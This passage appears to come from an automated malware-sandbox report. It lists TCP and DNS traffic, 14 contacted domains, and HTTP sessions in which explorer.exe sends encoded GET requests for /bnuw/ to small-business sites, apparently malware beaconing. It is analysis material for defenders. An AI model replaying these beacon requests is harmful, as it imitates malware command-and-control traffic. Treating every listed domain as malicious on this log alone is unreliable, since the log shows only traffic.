                                                                                                                                                        Jan 27, 2021 15:39:51.530761003 CET4973280192.168.2.5192.254.186.135
                                                                                                                                                        Jan 27, 2021 15:39:51.759130001 CET8049732192.254.186.135192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:52.432456970 CET8049732192.254.186.135192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:52.432607889 CET4973280192.168.2.5192.254.186.135
                                                                                                                                                        Jan 27, 2021 15:39:52.432883024 CET8049732192.254.186.135192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:52.432961941 CET4973280192.168.2.5192.254.186.135
                                                                                                                                                        Jan 27, 2021 15:39:56.952554941 CET4973380192.168.2.5118.27.99.25
                                                                                                                                                        Jan 27, 2021 15:39:57.233795881 CET8049733118.27.99.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:57.233949900 CET4973380192.168.2.5118.27.99.25
                                                                                                                                                        Jan 27, 2021 15:39:57.234358072 CET4973380192.168.2.5118.27.99.25
                                                                                                                                                        Jan 27, 2021 15:39:57.515638113 CET8049733118.27.99.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:57.515944004 CET8049733118.27.99.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:57.515974045 CET8049733118.27.99.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:57.516304970 CET4973380192.168.2.5118.27.99.25
                                                                                                                                                        Jan 27, 2021 15:39:57.516344070 CET4973380192.168.2.5118.27.99.25
                                                                                                                                                        Jan 27, 2021 15:39:57.797652960 CET8049733118.27.99.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:02.641360998 CET4973480192.168.2.5149.210.170.235
                                                                                                                                                        Jan 27, 2021 15:40:02.692210913 CET8049734149.210.170.235192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:02.692320108 CET4973480192.168.2.5149.210.170.235
                                                                                                                                                        Jan 27, 2021 15:40:02.692450047 CET4973480192.168.2.5149.210.170.235
                                                                                                                                                        Jan 27, 2021 15:40:02.742544889 CET8049734149.210.170.235192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:02.758419037 CET8049734149.210.170.235192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:02.758626938 CET4973480192.168.2.5149.210.170.235
                                                                                                                                                        Jan 27, 2021 15:40:02.758758068 CET4973480192.168.2.5149.210.170.235
                                                                                                                                                        Jan 27, 2021 15:40:02.808824062 CET8049734149.210.170.235192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:07.867913961 CET4973580192.168.2.551.195.43.214
                                                                                                                                                        Jan 27, 2021 15:40:07.922681093 CET804973551.195.43.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:07.923763990 CET4973580192.168.2.551.195.43.214
                                                                                                                                                        Jan 27, 2021 15:40:07.924004078 CET4973580192.168.2.551.195.43.214
                                                                                                                                                        Jan 27, 2021 15:40:07.984159946 CET804973551.195.43.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:07.984194040 CET804973551.195.43.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:07.984386921 CET4973580192.168.2.551.195.43.214
                                                                                                                                                        Jan 27, 2021 15:40:07.984555960 CET4973580192.168.2.551.195.43.214
                                                                                                                                                        Jan 27, 2021 15:40:08.297656059 CET4973580192.168.2.551.195.43.214
                                                                                                                                                        Jan 27, 2021 15:40:08.353122950 CET804973551.195.43.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:13.349124908 CET4973680192.168.2.5172.120.228.88
                                                                                                                                                        Jan 27, 2021 15:40:13.543555021 CET8049736172.120.228.88192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:13.548110008 CET4973680192.168.2.5172.120.228.88
                                                                                                                                                        Jan 27, 2021 15:40:13.548455954 CET4973680192.168.2.5172.120.228.88
                                                                                                                                                        Jan 27, 2021 15:40:13.742626905 CET8049736172.120.228.88192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:13.742654085 CET8049736172.120.228.88192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:13.742661953 CET8049736172.120.228.88192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:13.742937088 CET4973680192.168.2.5172.120.228.88
                                                                                                                                                        Jan 27, 2021 15:40:13.743068933 CET4973680192.168.2.5172.120.228.88
                                                                                                                                                        Jan 27, 2021 15:40:13.939255953 CET8049736172.120.228.88192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.849869967 CET4973880192.168.2.5192.0.78.25
                                                                                                                                                        Jan 27, 2021 15:40:18.892051935 CET8049738192.0.78.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.892137051 CET4973880192.168.2.5192.0.78.25
                                                                                                                                                        Jan 27, 2021 15:40:18.892349958 CET4973880192.168.2.5192.0.78.25
                                                                                                                                                        Jan 27, 2021 15:40:18.935178041 CET8049738192.0.78.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.935271025 CET8049738192.0.78.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.935285091 CET8049738192.0.78.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.935425997 CET4973880192.168.2.5192.0.78.25
                                                                                                                                                        Jan 27, 2021 15:40:18.935455084 CET4973880192.168.2.5192.0.78.25
                                                                                                                                                        Jan 27, 2021 15:40:18.975014925 CET8049738192.0.78.25192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:24.016100883 CET4973980192.168.2.53.13.31.214
                                                                                                                                                        Jan 27, 2021 15:40:24.152404070 CET80497393.13.31.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:24.152544022 CET4973980192.168.2.53.13.31.214
                                                                                                                                                        Jan 27, 2021 15:40:24.152700901 CET4973980192.168.2.53.13.31.214
                                                                                                                                                        Jan 27, 2021 15:40:24.288650990 CET80497393.13.31.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:24.288676977 CET80497393.13.31.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:24.288707972 CET80497393.13.31.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:24.288944006 CET4973980192.168.2.53.13.31.214
                                                                                                                                                        Jan 27, 2021 15:40:24.289109945 CET4973980192.168.2.53.13.31.214
                                                                                                                                                        Jan 27, 2021 15:40:24.674043894 CET4973980192.168.2.53.13.31.214
                                                                                                                                                        Jan 27, 2021 15:40:24.810065985 CET80497393.13.31.214192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:29.383188963 CET4974080192.168.2.53.0.139.114
                                                                                                                                                        Jan 27, 2021 15:40:29.565690041 CET80497403.0.139.114192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:29.565810919 CET4974080192.168.2.53.0.139.114
                                                                                                                                                        Jan 27, 2021 15:40:29.565974951 CET4974080192.168.2.53.0.139.114
                                                                                                                                                        Jan 27, 2021 15:40:29.750519991 CET80497403.0.139.114192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:29.750543118 CET80497403.0.139.114192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:29.750552893 CET80497403.0.139.114192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:29.750932932 CET4974080192.168.2.53.0.139.114
                                                                                                                                                        Jan 27, 2021 15:40:29.751257896 CET4974080192.168.2.53.0.139.114
                                                                                                                                                        Jan 27, 2021 15:40:29.933583021 CET80497403.0.139.114192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:39.870892048 CET4974180192.168.2.534.102.136.180
                                                                                                                                                        Jan 27, 2021 15:40:39.913088083 CET804974134.102.136.180192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:39.913197041 CET4974180192.168.2.534.102.136.180
                                                                                                                                                        Jan 27, 2021 15:40:39.913343906 CET4974180192.168.2.534.102.136.180
                                                                                                                                                        Jan 27, 2021 15:40:39.955657959 CET804974134.102.136.180192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:40.054193974 CET804974134.102.136.180192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:40.054220915 CET804974134.102.136.180192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:40.054419041 CET4974180192.168.2.534.102.136.180
                                                                                                                                                        Jan 27, 2021 15:40:40.054483891 CET4974180192.168.2.534.102.136.180
                                                                                                                                                        Jan 27, 2021 15:40:40.094677925 CET804974134.102.136.180192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.221138954 CET4974280192.168.2.5192.249.115.168
                                                                                                                                                        Jan 27, 2021 15:40:45.429085016 CET8049742192.249.115.168192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.429220915 CET4974280192.168.2.5192.249.115.168
                                                                                                                                                        Jan 27, 2021 15:40:45.429397106 CET4974280192.168.2.5192.249.115.168
                                                                                                                                                        Jan 27, 2021 15:40:45.637469053 CET8049742192.249.115.168192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.696475029 CET8049742192.249.115.168192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.696536064 CET8049742192.249.115.168192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.696576118 CET8049742192.249.115.168192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.696614981 CET8049742192.249.115.168192.168.2.5

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 27, 2021 15:38:45.875884056 CET5244153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:45.926485062 CET53524418.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:38:46.859499931 CET6217653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:46.909560919 CET53621768.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:38:47.851159096 CET5959653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:47.907567024 CET53595968.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:38:49.442958117 CET6529653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:49.493769884 CET53652968.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:38:50.773060083 CET6318353192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:50.821254969 CET53631838.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:38:51.787713051 CET6015153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:51.844383001 CET53601518.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:38:53.829042912 CET5696953192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:53.885538101 CET53569698.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:38:55.474603891 CET5516153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:38:55.525357962 CET53551618.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:05.760987997 CET5475753192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:05.825810909 CET53547578.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:16.922173977 CET4999253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:17.934420109 CET4999253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:18.811259031 CET53499928.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:18.811944962 CET53499928.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:35.218573093 CET6007553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:35.269311905 CET53600758.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:35.954866886 CET5501653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:36.027398109 CET53550168.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:36.122454882 CET6434553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:36.180845022 CET53643458.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:41.313185930 CET5712853192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:41.363301039 CET53571288.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:42.426606894 CET5479153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:42.488184929 CET53547918.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:45.538866043 CET5046353192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:45.610472918 CET53504638.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:49.413269997 CET5039453192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:49.477861881 CET53503948.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:50.633255959 CET5853053192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:50.835007906 CET53585308.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:39:56.556267977 CET5381353192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:39:56.949820995 CET53538138.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:02.562994957 CET6373253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:02.639822006 CET53637328.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:07.770678043 CET5734453192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:07.866545916 CET53573448.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:12.994759083 CET5445053192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:13.348109007 CET53544508.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.616782904 CET5926153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:18.667355061 CET53592618.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:18.784562111 CET5715153192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:18.848720074 CET53571518.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:23.943500996 CET5941353192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:24.015012026 CET53594138.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:29.308646917 CET6051653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:29.381911039 CET53605168.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:39.808201075 CET5164953192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:39.869888067 CET53516498.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:45.075090885 CET6508653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:45.219017982 CET53650868.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:50.963036060 CET5643253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:51.322649002 CET53564328.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:40:56.994911909 CET5292953192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:40:57.059277058 CET53529298.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:02.182497025 CET6431753192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:02.246251106 CET53643178.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:10.697614908 CET6100453192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:10.935481071 CET53610048.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:16.680869102 CET5689553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:16.745192051 CET53568958.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:22.248065948 CET6237253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:22.306813002 CET53623728.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:22.966398954 CET6151553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:23.028085947 CET53615158.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:23.744988918 CET5667553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:23.808562994 CET53566758.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:24.252789974 CET5717253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:24.309011936 CET53571728.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:24.855230093 CET5526753192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:24.918915033 CET53552678.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:25.630397081 CET5096953192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:25.686964035 CET53509698.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:26.374568939 CET6436253192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:26.435890913 CET53643628.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:27.510409117 CET5476653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:27.577373981 CET53547668.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:28.761806965 CET6144653192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:28.823378086 CET53614468.8.8.8192.168.2.5
                                                                                                                                                        Jan 27, 2021 15:41:29.320130110 CET5751553192.168.2.58.8.8.8
                                                                                                                                                        Jan 27, 2021 15:41:29.379723072 CET53575158.8.8.8192.168.2.5

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        Jan 27, 2021 15:39:45.538866043 CET192.168.2.58.8.8.80x6dabStandard query (0)www.coredigit.netA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:39:50.633255959 CET192.168.2.58.8.8.80x4e6eStandard query (0)www.taxandbookkeepingsolutions.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:39:56.556267977 CET192.168.2.58.8.8.80x85aStandard query (0)www.rotalablog.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:02.562994957 CET192.168.2.58.8.8.80x5c61Standard query (0)www.expand.careA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:07.770678043 CET192.168.2.58.8.8.80xb8c4Standard query (0)www.alliswell.infoA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:12.994759083 CET192.168.2.58.8.8.80xa17Standard query (0)www.czb878.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:18.784562111 CET192.168.2.58.8.8.80x3cccStandard query (0)www.brendonellis.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:23.943500996 CET192.168.2.58.8.8.80x63f4Standard query (0)www.purposelyproductivelab.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:29.308646917 CET192.168.2.58.8.8.80x10d9Standard query (0)www.ekpays.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:39.808201075 CET192.168.2.58.8.8.80xcefeStandard query (0)www.beachesvr.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:45.075090885 CET192.168.2.58.8.8.80xcbf1Standard query (0)www.secretlairtoys.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:50.963036060 CET192.168.2.58.8.8.80xf0b2Standard query (0)www.dmvantalya.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:56.994911909 CET192.168.2.58.8.8.80x571dStandard query (0)www.husum-ferienwohnungen.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:41:02.182497025 CET192.168.2.58.8.8.80xfd25Standard query (0)www.swiftappliancessc.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:41:10.697614908 CET192.168.2.58.8.8.80x473aStandard query (0)www.state728.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:41:16.680869102 CET192.168.2.58.8.8.80x6041Standard query (0)www.coredigit.netA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        Jan 27, 2021 15:39:45.610472918 CET8.8.8.8192.168.2.50x6dabName error (3)www.coredigit.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:39:50.835007906 CET8.8.8.8192.168.2.50x4e6eNo error (0)www.taxandbookkeepingsolutions.comtaxandbookkeepingsolutions.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:39:50.835007906 CET8.8.8.8192.168.2.50x4e6eNo error (0)taxandbookkeepingsolutions.com192.254.186.135A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:39:56.949820995 CET8.8.8.8192.168.2.50x85aNo error (0)www.rotalablog.com118.27.99.25A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:02.639822006 CET8.8.8.8192.168.2.50x5c61No error (0)www.expand.careexpand.careCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:02.639822006 CET8.8.8.8192.168.2.50x5c61No error (0)expand.care149.210.170.235A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:07.866545916 CET8.8.8.8192.168.2.50xb8c4No error (0)www.alliswell.info51.195.43.214A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:13.348109007 CET8.8.8.8192.168.2.50xa17No error (0)www.czb878.com172.120.228.88A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:18.848720074 CET8.8.8.8192.168.2.50x3cccNo error (0)www.brendonellis.combrendonellis.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:18.848720074 CET8.8.8.8192.168.2.50x3cccNo error (0)brendonellis.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:18.848720074 CET8.8.8.8192.168.2.50x3cccNo error (0)brendonellis.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:24.015012026 CET8.8.8.8192.168.2.50x63f4No error (0)www.purposelyproductivelab.com3.13.31.214A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:29.381911039 CET8.8.8.8192.168.2.50x10d9No error (0)www.ekpays.comekpays.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:29.381911039 CET8.8.8.8192.168.2.50x10d9No error (0)ekpays.com3.0.139.114A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:39.869888067 CET8.8.8.8192.168.2.50xcefeNo error (0)www.beachesvr.combeachesvr.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:39.869888067 CET8.8.8.8192.168.2.50xcefeNo error (0)beachesvr.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:45.219017982 CET8.8.8.8192.168.2.50xcbf1No error (0)www.secretlairtoys.comsecretlairtoys.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:45.219017982 CET8.8.8.8192.168.2.50xcbf1No error (0)secretlairtoys.com192.249.115.168A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:51.322649002 CET8.8.8.8192.168.2.50xf0b2No error (0)www.dmvantalya.com154.204.140.233A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:40:57.059277058 CET8.8.8.8192.168.2.50x571dNo error (0)www.husum-ferienwohnungen.com46.38.226.47A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:41:02.246251106 CET8.8.8.8192.168.2.50xfd25No error (0)www.swiftappliancessc.comswiftappliancessc.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:41:02.246251106 CET8.8.8.8192.168.2.50xfd25No error (0)swiftappliancessc.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:41:10.935481071 CET8.8.8.8192.168.2.50x473aNo error (0)www.state728.com69.163.224.168A (IP address)IN (0x0001)
                                                                                                                                                        Jan 27, 2021 15:41:16.745192051 CET8.8.8.8192.168.2.50x6041Name error (3)www.coredigit.netnonenoneA (IP address)IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • www.taxandbookkeepingsolutions.com
                                                                                                                                                        • www.rotalablog.com
                                                                                                                                                        • www.expand.care
                                                                                                                                                        • www.alliswell.info
                                                                                                                                                        • www.czb878.com
                                                                                                                                                        • www.brendonellis.com
                                                                                                                                                        • www.purposelyproductivelab.com
                                                                                                                                                        • www.ekpays.com
                                                                                                                                                        • www.beachesvr.com
                                                                                                                                                        • www.secretlairtoys.com
                                                                                                                                                        • www.dmvantalya.com
                                                                                                                                                        • www.husum-ferienwohnungen.com
                                                                                                                                                        • www.swiftappliancessc.com
                                                                                                                                                        • www.state728.com

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.549732192.254.186.13580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:39:51.025964975 CET5322OUTGET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.taxandbookkeepingsolutions.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:39:52.432456970 CET5336INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:39:51 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                        Location: http://taxandbookkeepingsolutions.com/bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH
                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        1192.168.2.549733118.27.99.2580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:39:57.234358072 CET5337OUTGET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.rotalablog.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:39:57.515944004 CET5338INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:39:57 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 162
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.rotalablog.com/bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        10192.168.2.549743154.204.140.23380C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
